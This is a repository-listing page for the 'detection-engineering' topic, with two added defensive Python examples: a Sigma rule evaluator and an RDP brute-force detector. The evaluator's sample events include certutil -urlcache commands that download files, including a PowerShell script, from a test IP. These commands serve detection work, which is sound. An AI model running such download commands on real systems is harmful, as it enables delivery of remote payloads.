An open API service providing repository metadata for many open source software ecosystems.

Topic: "detection-engineering"

sbousseaden/EVTX-ATTACK-SAMPLES

Windows Events Attack Samples

Language: HTML - Size: 6.05 MB - Last synced at: 4 months ago - Pushed at: over 2 years ago - Stars: 2,322 - Forks: 413

DataDog/stratus-red-team

:cloud: :zap: Granular, Actionable Adversary Emulation for the Cloud

Language: Go - Size: 3.8 MB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 2,043 - Forks: 246

mikeroyal/Digital-Forensics-Guide

Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.

Language: Python - Size: 367 KB - Last synced at: 2 months ago - Pushed at: over 1 year ago - Stars: 1,897 - Forks: 223

matanolabs/matano

Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS

Language: Rust - Size: 11 MB - Last synced at: about 2 months ago - Pushed at: 7 months ago - Stars: 1,559 - Forks: 111

splunk/security_content

Splunk Security Content

Language: Python - Size: 291 MB - Last synced at: 2 days ago - Pushed at: 2 days ago - Stars: 1,458 - Forks: 410

BushidoUK/Ransomware-Tool-Matrix

A resource containing all the tools each ransomware gang uses

Size: 692 KB - Last synced at: 19 days ago - Pushed at: 19 days ago - Stars: 1,065 - Forks: 117

mthcht/awesome-lists

Awesome Security lists for SOC/CERT/CTI

Language: YARA - Size: 18.7 GB - Last synced at: about 12 hours ago - Pushed at: about 12 hours ago - Stars: 1,050 - Forks: 135

infosecB/awesome-detection-engineering

Detection Engineering is a tactical function of a cybersecurity defense program that involves the design, implementation, and operation of detective controls with the goal of proactively identifying malicious or unauthorized activity before it negatively impacts an individual or an organization.

Size: 130 KB - Last synced at: 13 days ago - Pushed at: 26 days ago - Stars: 1,011 - Forks: 92

mikeroyal/Open-Source-Security-Guide

Open Source Security Guide. Learn all about Security Standards (FIPS, CIS, FedRAMP, FISMA, etc.), Frameworks, Threat Models, Encryption, and Benchmarks.

Language: Go - Size: 655 KB - Last synced at: 2 months ago - Pushed at: over 1 year ago - Stars: 965 - Forks: 86

mvelazc0/PurpleSharp

PurpleSharp is a C# adversary simulation tool that executes adversary techniques with the purpose of generating attack telemetry in monitored Windows environments

Language: C# - Size: 859 KB - Last synced at: 15 days ago - Pushed at: 7 months ago - Stars: 813 - Forks: 111

Cyb3r-Monk/Threat-Hunting-and-Detection

Repository for threat hunting and detection queries, etc. for Defender for Endpoint and Microsoft Sentinel in KQL (Kusto Query Language).

Language: Jupyter Notebook - Size: 407 KB - Last synced at: about 2 months ago - Pushed at: 4 months ago - Stars: 731 - Forks: 105

runreveal/pql

Pipelined Query Language

Language: Go - Size: 215 KB - Last synced at: 4 months ago - Pushed at: 7 months ago - Stars: 649 - Forks: 25

mthcht/ThreatHunting-Keywords

Awesome list of keywords and artifacts for Threat Hunting sessions

Language: PowerShell - Size: 209 MB - Last synced at: 12 days ago - Pushed at: 23 days ago - Stars: 585 - Forks: 70

sbousseaden/Slides

Misc Threat Hunting Resources

Size: 13.6 MB - Last synced at: over 1 year ago - Pushed at: over 2 years ago - Stars: 359 - Forks: 61

nianticlabs/venator

A flexible threat detection platform that simplifies rule management and deployment using K8s CronJob and Helm, but can also run standalone or with other job schedulers like Nomad.

Language: Go - Size: 356 KB - Last synced at: 8 months ago - Pushed at: 10 months ago - Stars: 353 - Forks: 19

DataDog/threatest

Threatest is a CLI and Go framework for end-to-end testing threat detection rules.

Language: Go - Size: 382 KB - Last synced at: 5 days ago - Pushed at: 3 months ago - Stars: 331 - Forks: 24

DataDog/grimoire

Generate datasets of cloud audit logs for common attacks

Language: Go - Size: 1.11 MB - Last synced at: 8 days ago - Pushed at: 12 months ago - Stars: 216 - Forks: 20

lolc2/lolc2.github.io

lolC2 is a collection of C2 frameworks that leverage legitimate services to evade detection

Language: HTML - Size: 37.5 MB - Last synced at: about 2 months ago - Pushed at: about 2 months ago - Stars: 209 - Forks: 18

mthcht/Purpleteam

Purpleteam scripts simulation & Detection - trigger events for SOC detections

Language: PowerShell - Size: 39.5 MB - Last synced at: about 1 month ago - Pushed at: 7 months ago - Stars: 185 - Forks: 20

nasbench/SIGMA-Resources

Resources To Learn And Understand SIGMA Rules

Size: 13.7 KB - Last synced at: 5 days ago - Pushed at: over 2 years ago - Stars: 179 - Forks: 13

0xrawsec/gene

Signature engine for all your logs

Language: Go - Size: 5.64 MB - Last synced at: about 1 month ago - Pushed at: over 1 year ago - Stars: 170 - Forks: 19

3CORESec/SIEGMA

SIEGMA - Transform Sigma rules into SIEM consumables

Language: Python - Size: 1.01 MB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 149 - Forks: 23

lawndoc/AdvancedHuntingQueries

Microsoft 365 Advanced Hunting Queries with hotlinks that plug the query right into your tenant.

Size: 327 KB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 124 - Forks: 17

mthcht/ThreatHunting-Keywords-yara-rules

yara detection rules for hunting with the threathunting-keywords project

Language: YARA - Size: 86.4 MB - Last synced at: 12 days ago - Pushed at: 3 months ago - Stars: 124 - Forks: 18

rfackroyd/detection-engineering-starter-pack

A starter pack of resources to help you get started in Detection Engineering.

Size: 18.6 KB - Last synced at: 18 days ago - Pushed at: 18 days ago - Stars: 110 - Forks: 16

mvelazc0/attack2jira

attack2jira automates the process of standing up a Jira environment that can be used to track and measure ATT&CK coverage

Language: Python - Size: 50.8 KB - Last synced at: over 1 year ago - Pushed at: over 2 years ago - Stars: 108 - Forks: 31

st0pp3r/awesome-detection-engineer

Online resources related to Detection Engineering. Detection rules, detection logic, attack samples, detection tests and emulation tools, logging configuration and best practices, event log references, resources, labs, data manipulation online tools, blogs, newsletters, good reads, books, trainings, podcasts, videos and twitter/x accounts.

Language: HTML - Size: 512 KB - Last synced at: 6 days ago - Pushed at: 14 days ago - Stars: 104 - Forks: 14

anvilogic-forge/armory

Anvilogic Forge

Size: 2.33 MB - Last synced at: 22 days ago - Pushed at: 23 days ago - Stars: 104 - Forks: 7

ControlCompass/ControlCompass.github.io

Pointing cybersecurity teams to thousands of detection rules and offensive security tests aligned with common attacker techniques

Language: JavaScript - Size: 2.78 MB - Last synced at: over 2 years ago - Pushed at: almost 3 years ago - Stars: 91 - Forks: 20

bradleyjkemp/sigma-go

A Go implementation and parser for Sigma rules.

Language: Go - Size: 357 KB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 89 - Forks: 18

AttackIQ/SigmAIQ

A pySigma wrapper and langchain toolkit for automatic rule creation/translation

Language: Python - Size: 1.49 MB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 81 - Forks: 12

0xAnalyst/DefenderATPQueries

Hunting Queries for Defender ATP

Size: 349 KB - Last synced at: 4 months ago - Pushed at: 4 months ago - Stars: 81 - Forks: 8

adrianlois/DFIR-Detection-Engineering

Digital Forensics Incident Response and Detection engineering: forensic analysis of common and not-so-common artifacts. Anti-forensic techniques, and detection of the techniques malicious actors use to evade protection and monitoring systems.

Size: 1.29 MB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 80 - Forks: 12

AlbinoGazelle/esxi-testing-toolkit

🧰 ESXi Testing Toolkit is a command-line utility designed to help security teams test ESXi detections.

Language: Python - Size: 13 MB - Last synced at: about 1 month ago - Pushed at: 3 months ago - Stars: 76 - Forks: 10

krdmnbrk/AttackRuleMap

Mapping of open-source detection rules and atomic tests.

Size: 1.65 MB - Last synced at: 6 months ago - Pushed at: 6 months ago - Stars: 72 - Forks: 7

mannyfred/MentalTi

Mentally ill EtwTi parser

Language: C++ - Size: 248 KB - Last synced at: 6 days ago - Pushed at: 6 days ago - Stars: 63 - Forks: 3

reversinglabs/reversinglabs-siem-rules

A collection of various SIEM rules relating to malware family groups.

Language: YARA - Size: 164 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 59 - Forks: 6

infosecB/detection-as-code

An example of how to deploy a Detection as Code pipeline using Sigma Rules, Sigmac, Gitlab CI, and Splunk.

Language: Python - Size: 33.2 KB - Last synced at: 3 months ago - Pushed at: over 3 years ago - Stars: 55 - Forks: 14

mthcht/ThreatHunting-Keywords-sigma-rules

Sigma detection rules for hunting with the threathunting-keywords project

Language: Python - Size: 176 MB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 54 - Forks: 7

3CORESec/Automata

Automatic detection engineering technical state compliance

Language: Python - Size: 3.24 MB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 48 - Forks: 11

west-wind/Threat-Hunting-With-Splunk

Awesome Splunk SPL hunt queries that can be used to detect the latest vulnerability exploitation attempts & subsequent compromise

Size: 53.7 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 48 - Forks: 6

M3NIX/sigmaio 📦

simple webapp for converting sigma rules into siem queries using the pySigma library

Language: HTML - Size: 53.7 KB - Last synced at: almost 2 years ago - Pushed at: almost 2 years ago - Stars: 43 - Forks: 3

center-for-threat-informed-defense/summiting-the-pyramid

Summiting the Pyramid is a research project focused on engineering cyber analytics to make adversary evasion more difficult. The research includes a scoring model, methodology, and worked examples.

Language: Makefile - Size: 22 MB - Last synced at: about 2 months ago - Pushed at: 2 months ago - Stars: 41 - Forks: 3

certeu/droid

A pySigma wrapper to manage detection rules.

Language: Python - Size: 259 KB - Last synced at: 19 days ago - Pushed at: 19 days ago - Stars: 40 - Forks: 4

nasbench/Eventlog_Compendium

The Eventlog Compendium is the go-to resource for understanding Windows Event Logs.

Language: Python - Size: 149 MB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 37 - Forks: 3

krdmnbrk/atomicgen.io

A simple tool designed to create Atomic Red Team tests with ease.

Language: JavaScript - Size: 722 KB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 37 - Forks: 4

LogCraftIO/logcraft-cli

Detection-as-Code CI/CD pipeline for modern security operations (SIEM, EDR, XDR, ...)

Language: Rust - Size: 592 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 21 - Forks: 1

center-for-threat-informed-defense/m3tid

The Measure, Maximize, and Mature Threat-Informed Defense (M3TID) project defines what Threat-Informed Defense (TID) is and the key activities associated with its practice.

Language: Makefile - Size: 5.69 MB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 16 - Forks: 3

Digital-Defense-Institute/lc-detectionforge

A specialized environment for crafting, validating, and testing LimaCharlie detection rules

Language: Vue - Size: 493 KB - Last synced at: 1 day ago - Pushed at: 5 days ago - Stars: 14 - Forks: 2

BenjiTrapp/aws-threat-hunting

Short deep dive into Threat Hunting on AWS

Language: Jupyter Notebook - Size: 234 MB - Last synced at: 6 days ago - Pushed at: almost 2 years ago - Stars: 13 - Forks: 2

panther-labs/pypanther-starter-kit

A Python-native Detection as Code Framework

Language: Python - Size: 312 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 12 - Forks: 6

panther-labs/pypanther

A Pythonic Detection Rules Framework

Language: Python - Size: 3.2 MB - Last synced at: 5 days ago - Pushed at: 5 days ago - Stars: 11 - Forks: 2

TracecatHQ/hunts

🐻‍❄️ 🏹 Threat hunting with Polars and flaws.cloud AWS CloudTrail datasets.

Language: Jupyter Notebook - Size: 69.3 KB - Last synced at: about 1 month ago - Pushed at: about 1 year ago - Stars: 11 - Forks: 1

erickatwork/threat-detection-engineering-reference

Resource for all things threat detection

Size: 3.98 MB - Last synced at: 6 months ago - Pushed at: 6 months ago - Stars: 9 - Forks: 0

H3llKa1ser/SOC-Assistant-Guide

A Security Operations playbook to assist blue teamers from day-to-day tasks to Digital Forensics and Incident Response (DFIR) activities.

Size: 182 KB - Last synced at: 7 months ago - Pushed at: 7 months ago - Stars: 9 - Forks: 2

deadbits/trs

🔭 Threat report analysis via LLM and Vector DB

Language: Python - Size: 1.29 MB - Last synced at: 3 months ago - Pushed at: over 1 year ago - Stars: 9 - Forks: 1

qasimqlf/StepbyStep_CyberSecurity

A Step by Step Guide for Cyber Security Beginners to Jump into the right path

Size: 41.1 MB - Last synced at: 6 months ago - Pushed at: over 2 years ago - Stars: 8 - Forks: 11

oliviagallucci/og-apple-security

my notes on Apple security 💻🍏

Language: Objective-C - Size: 41.8 MB - Last synced at: about 10 hours ago - Pushed at: about 13 hours ago - Stars: 7 - Forks: 0

muchdogesec/txt2detection

A command line tool that takes a txt file containing threat intelligence and turns it into a detection rule.

Language: Python - Size: 380 KB - Last synced at: 12 days ago - Pushed at: 12 days ago - Stars: 7 - Forks: 1

jacobstickney/ThreatActorProcedures-MITRE-ATTACK

A collection of specific commands used by threat actors, detailing their procedural implementations of tactics and techniques from the MITRE ATT&CK framework.

Size: 126 KB - Last synced at: 3 months ago - Pushed at: 6 months ago - Stars: 7 - Forks: 2

MrM8BRH/Defensive-Security-Hub

A curated collection of essential resources, tools, and references for Security Operations Center (SOC) analysts.

Size: 3.85 MB - Last synced at: 1 day ago - Pushed at: 1 day ago - Stars: 6 - Forks: 1

circulatedev/circulate

The Open Source Threat Intelligence Knowledge Graph for identifying and correlating TTPs, IOCs, and insights relevant to your organization.

Language: HCL - Size: 2.1 MB - Last synced at: about 2 years ago - Pushed at: over 2 years ago - Stars: 6 - Forks: 1

CodeByHarri/Sigma2KQL

Sigma Queries turned into KQL for Defender using pysigma

Size: 753 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 5 - Forks: 2

JakePeralta7/CyberSecurity

Research, Rules, Books, Tools and more basic stuff you can get anywhere

Language: Python - Size: 439 MB - Last synced at: over 2 years ago - Pushed at: over 2 years ago - Stars: 5 - Forks: 0

crazyeights225/WinEventLogExplorer

Capture all events across all logs produced during the running of a particular exploit/script. Search and filter events

Language: PowerShell - Size: 1.26 MB - Last synced at: almost 2 years ago - Pushed at: almost 4 years ago - Stars: 5 - Forks: 0

Arizona-Cyber-Threat-Response-Alliance/rmm-detection

A repository for tools and resources for detecting and managing RMM in enterprise environments.

Size: 640 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 4 - Forks: 2

cyberphor/deathlab

My Detection Engineering and Threat Hunting (DEATH) Lab.

Language: HCL - Size: 229 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 4 - Forks: 0

databricks-industry-solutions/cybersecurity-ml-tutorials

Machine learning notebooks using cybersecurity data

Language: Python - Size: 43 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 4 - Forks: 0

infosecB/generate_attacknav_layer

A Python CLI utility for quickly converting a list or text file of MITRE ATT&CK technique IDs to a MITRE ATT&CK Navigator layer .JSON file.

Language: Python - Size: 33 MB - Last synced at: about 2 months ago - Pushed at: over 3 years ago - Stars: 4 - Forks: 0

darkquasar/purplerepo

🛡️⚔️ Curated GitHub repos for Defensive & Offensive Cyber Tradecraft

Language: TypeScript - Size: 17.4 MB - Last synced at: 4 days ago - Pushed at: 4 days ago - Stars: 3 - Forks: 2

runreveal/runreveal-docs

The code powering RunReveal's documentation.

Language: MDX - Size: 28.1 MB - Last synced at: 7 days ago - Pushed at: 7 days ago - Stars: 3 - Forks: 3

whichbuffer/Threat-Detection-Rules

Threat Detection Repository - YARA / SIGMA rules

Language: YARA - Size: 104 KB - Last synced at: over 1 year ago - Pushed at: over 1 year ago - Stars: 3 - Forks: 0

2O0K/Sentinel-Rules

Updated Sigma2KQL script written by @CodeByHarri + Generating Analytics & Hunting Rules ready for Sentinel Deployment

Language: Python - Size: 6.79 MB - Last synced at: 2 months ago - Pushed at: 11 months ago - Stars: 2 - Forks: 0

LogCraftIO/logcraft-cli-plugins

Plugins for LogCraft CLI

Language: Rust - Size: 120 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 2 - Forks: 0

rgi-group/Cloud-DART

Cloud-DART is a comprehensive repository that provides Standard Operating Procedures (SOPs), Jupyter Notebooks, and code blocks for detection and response in cloud environments. This repository is designed to assist security professionals in automating and enhancing their cloud security posture.

Language: Python - Size: 1.15 MB - Last synced at: over 1 year ago - Pushed at: over 1 year ago - Stars: 2 - Forks: 0

Ben4FH/Adaz-Sentinel Fork of christophetd/Adaz

Microsoft Sentinel fork of Adaz :wrench: Deploy customizable Active Directory labs in Azure - automatically.

Language: HCL - Size: 4.16 MB - Last synced at: over 2 years ago - Pushed at: almost 3 years ago - Stars: 2 - Forks: 0

3CORESec/dtio-kb

Technical resources and knowledge base for dtection.io

Language: Shell - Size: 22.8 MB - Last synced at: over 2 years ago - Pushed at: about 4 years ago - Stars: 2 - Forks: 0

muchdogesec/siemrules

An API that takes a txt file containing threat intelligence and turns it into a detection rule.

Language: Python - Size: 473 KB - Last synced at: 1 day ago - Pushed at: 1 day ago - Stars: 1 - Forks: 1

penxpkj/Defensive-Security-Hub

Defensive Security Hub: a curated collection of essential resources, tools, and references for Security Operations Center (SOC) analysts. This repository aims to support your security efforts and enhance your skills. 🌐🔒

Size: 25.4 KB - Last synced at: 12 days ago - Pushed at: 12 days ago - Stars: 1 - Forks: 0

certeu/moriohub

No need to re-invent the observability wheel. What you need is perhaps already on Moriohub!

Language: JavaScript - Size: 150 KB - Last synced at: about 2 months ago - Pushed at: about 2 months ago - Stars: 1 - Forks: 2

pop-ecx/sigma-ls

A minimal language server to help in writing sigma rules

Language: Python - Size: 31.2 MB - Last synced at: about 2 months ago - Pushed at: about 2 months ago - Stars: 1 - Forks: 0

Aamir-Muhammad/CrowdStrike-Queries

CrowdStrike Falcon Advanced Threat Hunting Queries

Size: 35.2 KB - Last synced at: 25 days ago - Pushed at: 3 months ago - Stars: 1 - Forks: 0

infosecB/Rulehound

An index of publicly available and open-source threat detection rulesets.

Size: 286 KB - Last synced at: 4 months ago - Pushed at: 4 months ago - Stars: 1 - Forks: 0

muchdogesec/awesome_detection_rules

A curated list of Awesome Detection Rules

Size: 5.86 KB - Last synced at: 8 days ago - Pushed at: 8 months ago - Stars: 1 - Forks: 1

lukejjh/MicrosoftSentinel

An assortment of resources pertaining to Defender XDR and Microsoft Sentinel, such as KQL hunting queries and workbooks.

Size: 3.02 MB - Last synced at: 8 months ago - Pushed at: 8 months ago - Stars: 1 - Forks: 0

fish-not-phish/cb-inspector

De-facto parent tenant for Carbon Black Enterprise EDR

Language: Python - Size: 72.3 KB - Last synced at: almost 2 years ago - Pushed at: almost 2 years ago - Stars: 1 - Forks: 0

TTLNinja/madlibs

DNS sourced Mad Lib Game

Language: HTML - Size: 179 KB - Last synced at: 4 days ago - Pushed at: 4 days ago - Stars: 0 - Forks: 0

integrateddefense/lab_infra

Infrastructure as Code for the home lab

Size: 258 KB - Last synced at: 4 days ago - Pushed at: 4 days ago - Stars: 0 - Forks: 0

ndr-repo/awesome-threat-hunting

Size: 45.9 KB - Last synced at: 7 days ago - Pushed at: 7 days ago - Stars: 0 - Forks: 0

Chintan2604/forensic

All-in-one Docker container for digital investigation, with pre-installed tools for forensic analysis of disks, memory, malware, and mobile devices.

Language: Dockerfile - Size: 11.7 KB - Last synced at: 8 days ago - Pushed at: 8 days ago - Stars: 0 - Forks: 0

Gamlive11/og-apple-security

Explore notes on Apple security, focusing on macOS detection engineering and threat hunting. Enhance your skills with resources and practical insights. 🐙🍏

Size: 1.95 KB - Last synced at: 12 days ago - Pushed at: 12 days ago - Stars: 0 - Forks: 0

Guilh6924/grimoire

Create professional EPUBs effortlessly with Grimoire. Perfect for authors, bloggers, and educators. Start writing today! 🚀📚

Language: JavaScript - Size: 117 KB - Last synced at: 29 days ago - Pushed at: 29 days ago - Stars: 0 - Forks: 0

texasbe2trill/sigma-linux-backend

A lightweight, standalone implementation for Sigma rule evaluation when the full pySigma backend ecosystem isn't available or when you need a simple, dependency-light solution.

Language: Python - Size: 46.9 KB - Last synced at: 7 days ago - Pushed at: about 1 month ago - Stars: 0 - Forks: 0
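What a standalone Sigma evaluator like the one above actually has to do, shown as an added example written for this page (it is not code from texasbe2trill/sigma-linux-backend or any other project listed here). The rule, its field names and the Sysmon-shaped events are constructed; the evaluator covers only selection maps, the |contains, |startswith, |endswith and |all modifiers, * and ? wildcards, and an and/or/not condition with parentheses. Aggregations, keyword lists and "1 of selection*" conditions are deliberately out of scope.

```python
"""Minimal Sigma-style rule evaluator (added example; not code from any project listed
on this page). Handles selection maps, |contains/|startswith/|endswith/|all, wildcards
and an and/or/not condition. Aggregations and "1 of selection*" are out of scope."""
import ast
import fnmatch
from typing import Any

# Constructed (hypothetical) rule as a dict; a real Sigma rule is YAML with the same keys.
RULE: dict[str, Any] = {
    "title": "certutil used to fetch a remote file",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {"Image|endswith": "\\certutil.exe",
                      "CommandLine|contains|all": ["-urlcache", "http"]},
        "filter_system": {"User|startswith": "NT AUTHORITY\\"},
        "condition": "selection and not filter_system",
    },
}

# Constructed sample events shaped like Sysmon process-creation records (addresses are TEST-NET-2).
EVENTS: list[dict[str, Any]] = [
    {"Image": r"C:\Windows\System32\certutil.exe", "User": r"CORP\alice",
     "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "certutil.exe -urlcache -f http://198.51.100.7/p.ps1 p.ps1"},
    {"Image": r"C:\Windows\System32\certutil.exe", "User": r"CORP\bob",
     "CommandLine": "certutil.exe -verify cert.cer"},
    {"Image": r"C:\Windows\System32\cmd.exe", "User": r"CORP\carol", "CommandLine": "cmd.exe /c dir"},
]


def value_matches(actual: str, pattern: str, mods: set[str]) -> bool:
    """Sigma string matching is case-insensitive; plain values may use * and ? wildcards."""
    a, p = actual.lower(), pattern.lower()
    if "contains" in mods:
        return p in a
    if "startswith" in mods:
        return a.startswith(p)
    if "endswith" in mods:
        return a.endswith(p)
    return fnmatch.fnmatchcase(a, p)


def field_matches(event: dict[str, Any], key: str, expected: Any) -> bool:
    """Evaluate one 'Field|mod|mod: value(s)' entry of a selection against an event."""
    field, *mods = key.split("|")
    if field not in event:
        return False
    values = expected if isinstance(expected, list) else [expected]
    hits = [value_matches(str(event[field]), str(v), set(mods)) for v in values]
    return all(hits) if "all" in mods else any(hits)  # value lists are OR-ed unless |all


def selection_matches(event: dict[str, Any], selection: Any) -> bool:
    """A selection map AND-s its fields; a list of maps OR-s the maps."""
    if isinstance(selection, list):
        return any(selection_matches(event, s) for s in selection)
    return all(field_matches(event, k, v) for k, v in selection.items())


def eval_condition(condition: str, truth: dict[str, bool]) -> bool:
    """Sigma's and/or/not/parentheses condition is also a valid Python boolean expression,
    so parse it with ast and interpret only BoolOp, Not and Name nodes (never eval())."""
    def walk(node: ast.AST) -> bool:
        if isinstance(node, ast.BoolOp):
            vals = [walk(v) for v in node.values]
            return all(vals) if isinstance(node.op, ast.And) else any(vals)
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.Not):
            return not walk(node.operand)
        if isinstance(node, ast.Name) and node.id in truth:
            return truth[node.id]
        raise ValueError(f"unsupported condition element: {ast.dump(node)}")
    try:
        tree = ast.parse(condition, mode="eval")
    except SyntaxError as exc:
        raise ValueError(f"condition not supported by this evaluator: {condition!r}") from exc
    return walk(tree.body)


def rule_matches(rule: dict[str, Any], event: dict[str, Any]) -> bool:
    detection = rule["detection"]
    truth = {name: selection_matches(event, sel)
             for name, sel in detection.items() if name != "condition"}
    return eval_condition(detection["condition"], truth)


def matching_events(rule: dict[str, Any], events: list[dict[str, Any]]) -> list[int]:
    """Indexes of the events the rule fires on; for RULE over EVENTS only event 0 matches."""
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]
```

Event 1 is suppressed by the filter (SYSTEM running certutil), event 2 lacks -urlcache, and event 3 is not certutil at all, so only event 0 fires. The condition is interpreted by walking the Python AST rather than with eval(), so a rule author cannot smuggle arbitrary code into a condition string.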

wai-htet/Threat-Detection-Pipeline

A modular, containerized cybersecurity pipeline that simulates real-time threat detection, centralized logging (SIEM), and automated incident response (SOAR). Built for scalability, automation, and real-world detection engineering.

Language: Python - Size: 3.91 KB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 0 - Forks: 0

mf1d3l/HayabusaToWinEventLog

Hayabusa to the SIEM made easy

Language: PowerShell - Size: 531 KB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 0 - Forks: 0

rhejos/soc-detection-lab

Detection engineering lab using Splunk, Sigma, and Windows logs — mapped to MITRE ATT&CK

Size: 1.95 KB - Last synced at: 2 months ago - Pushed at: 3 months ago - Stars: 0 - Forks: 0

armandoariasinfosec/splunk-brute-force-detection-lab

Detect and alert brute-force RDP attacks using Splunk, Windows logs, and a simulated Kali Linux attacker. Home lab project.

Size: 7.81 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 0 - Forks: 0
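The detection this lab describes, reduced to its logic and run over constructed Windows Security 4625 (failed logon) events, as an added example for this page. It is not code from armandoariasinfosec/splunk-brute-force-detection-lab; the IP addresses, usernames, timestamps, threshold and window are made up, and the events are reduced to the four fields the logic needs.

```python
"""Threshold detection for RDP brute force over Windows Security 4625 (failed logon)
events. Added example for this page, not code from the listed lab; the events are
constructed and reduced to the fields the logic needs."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed 4625 events: (TimeCreated, IpAddress, TargetUserName, LogonType).
# LogonType 10 = RemoteInteractive (RDP); 3 = Network (SMB, WinRM, ...).
FAILED_LOGONS = [
    # Six RDP failures from one source in ~2 minutes across three accounts: a spray.
    ("2024-05-01T10:00:00", "10.0.0.5", "administrator", 10),
    ("2024-05-01T10:00:20", "10.0.0.5", "administrator", 10),
    ("2024-05-01T10:00:45", "10.0.0.5", "admin", 10),
    ("2024-05-01T10:01:10", "10.0.0.5", "admin", 10),
    ("2024-05-01T10:01:40", "10.0.0.5", "svc_backup", 10),
    ("2024-05-01T10:02:05", "10.0.0.5", "svc_backup", 10),
    # A user mistyping a password a few times across the morning: stays below threshold.
    ("2024-05-01T08:00:00", "10.0.0.9", "alice", 10),
    ("2024-05-01T09:10:00", "10.0.0.9", "alice", 10),
    ("2024-05-01T10:30:00", "10.0.0.9", "alice", 10),
    # Network (non-RDP) failures from a third host; counted only if logon_types includes 3.
    ("2024-05-01T10:00:01", "10.0.0.12", "bob", 3),
    ("2024-05-01T10:00:02", "10.0.0.12", "bob", 3),
    ("2024-05-01T10:00:03", "10.0.0.12", "bob", 3),
    ("2024-05-01T10:00:04", "10.0.0.12", "bob", 3),
    ("2024-05-01T10:00:05", "10.0.0.12", "bob", 3),
]


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5),
                      logon_types=frozenset({10})):
    """One alert per source IP, raised the first time `threshold` failures for the
    selected logon types fall inside a sliding `window`. The distinct-user count in
    the window separates single-account guessing from a password spray."""
    by_src = defaultdict(list)
    for ts, src, user, logon_type in events:
        if logon_type in logon_types:
            by_src[src].append((datetime.fromisoformat(ts), user))

    alerts = []
    for src, attempts in by_src.items():
        recent = deque()
        for ts, user in sorted(attempts):  # logs rarely arrive in order; sort per source
            recent.append((ts, user))
            while ts - recent[0][0] > window:  # drop attempts that fell out of the window
                recent.popleft()
            if len(recent) >= threshold:
                alerts.append({
                    "src_ip": src,
                    "first_seen": recent[0][0].isoformat(),
                    "last_seen": ts.isoformat(),
                    "attempts": len(recent),
                    "distinct_users": len({u for _, u in recent}),
                })
                break  # one alert per source; a real pipeline would suppress repeats instead
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(FAILED_LOGONS):
        print(alert)
```

With the defaults only 10.0.0.5 alerts, at its fifth failure, with three distinct usernames in the window. Passing logon_types={3, 10} also surfaces the network logon failures from 10.0.0.12, and the legitimate user at 10.0.0.9 never crosses the threshold because her failures are spread over hours. A follow-up a practitioner would add is a 4624 (successful logon) from the same source after the burst, which turns a brute-force attempt into a likely compromise.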

Samriddhi5/incident-response-playbooks

Incident response playbooks and templates for real-world security scenarios

Size: 0 Bytes - Last synced at: 4 months ago - Pushed at: 4 months ago - Stars: 0 - Forks: 0

SpoofIMEI/LiteCanary

Self hostable canary alerts

Language: Go - Size: 46.9 KB - Last synced at: about 2 months ago - Pushed at: 5 months ago - Stars: 0 - Forks: 0

xpinux/Project-SABER

Project-SABER: A repository of KQL queries and parsers for threat hunting, threat detection, and log parsing in Microsoft Sentinel & Microsoft XDR (formerly Microsoft 365 Defender)

Size: 58.6 KB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 0 - Forks: 0